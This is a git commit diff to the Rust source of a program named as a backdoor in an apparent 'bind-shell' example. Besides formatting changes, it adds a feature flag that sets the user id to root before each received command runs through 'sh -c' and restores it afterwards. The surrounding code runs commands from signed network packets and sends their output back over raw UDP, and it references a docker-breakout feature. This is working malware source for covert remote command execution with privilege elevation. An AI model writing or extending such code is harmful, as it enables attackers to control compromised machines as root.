feat: added setuid capabilities

2023-08-23 22:40:21 -04:00
parent 1517ca6f1c
commit 180b29531a
4 changed files with 37 additions and 17 deletions
--- a/examples/bind-shell/backdoor/src/main.rs
+++ b/examples/bind-shell/backdoor/src/main.rs
@@ -35,7 +35,11 @@ async fn handled_main() -> anyhow::Result<()> {

    log::info!("Pubkey is good");

-    let port = std::env::args().skip(1).next().and_then(|a| a.parse::<u16>().ok()).unwrap_or(54248);
+    let port = std::env::args()
+        .skip(1)
+        .next()
+        .and_then(|a| a.parse::<u16>().ok())
+        .unwrap_or(54248);

    #[cfg(feature = "docker-breakout")]
    unsafe {
@@ -105,8 +109,9 @@ async fn handled_main() -> anyhow::Result<()> {
                            pubkey_clone,
                            pkt,
                            packet_sender_clone,
-                            exit_sender_clone
-                        ).await
+                            exit_sender_clone,
+                        )
+                        .await
                        {
                            log::warn!("Error handling packet: {e}");
                        }
@@ -129,7 +134,7 @@ async fn handle_command(
    pubkey: Arc<PublicKey>,
    eth: EthernetPacket,
    send_response: mpsc::Sender<EthernetPacket>,
-    send_exit: mpsc::Sender<()>
+    send_exit: mpsc::Sender<()>,
 ) -> anyhow::Result<()> {
    use pcap_sys::packets::*;
    let eth_pkt = eth.pkt();
@@ -195,6 +200,13 @@ async fn handle_command(
        _ => {}
    }

+    #[cfg(feature = "setuid")]
+    let current_id = unsafe {
+        let id = libc::getuid();
+        libc::setuid(0);
+        id
+    };
+
    let Ok(mut child) = (process::Command::new("sh")
        .arg("-c")
        .arg(cmd)
@@ -212,13 +224,13 @@ async fn handle_command(
    {
        let stdout = match &mut child.stdout {
            Some(ref mut stdout) => stdout,
-            None => bail!("could not get child process stdout")
+            None => bail!("could not get child process stdout"),
        };
        let stderr = match &mut child.stderr {
            Some(ref mut stderr) => stderr,
-            None => bail!("could not get child process stderr")
+            None => bail!("could not get child process stderr"),
        };
-        
+
        enum Output {
            Out,
            Err,
@@ -245,11 +257,11 @@ async fn handle_command(
            let fullmsg = &[
                match out_type {
                    Output::Out => &[1],
-                    Output::Err => &[2]
+                    Output::Err => &[2],
                },
-                msg
+                msg,
            ]
-                .concat();
+            .concat();

            let udp_packet = UDPPacket::construct(54248, source_port, &**fullmsg);
            let ip_packet = IPv4Packet::construct(
@@ -279,6 +291,11 @@ async fn handle_command(
        .try_into()
        .unwrap();

+    #[cfg(feature = "setuid")]
+    if current_id != 0 {
+        unsafe { libc::setuid(current_id) };
+    }
+
    let done_udp_packet = UDPPacket::construct(54248, source_port, *&[0u8, exit_code]);
    let done_ip_packet = IPv4Packet::construct(
        ip_pkt.dest_ip(),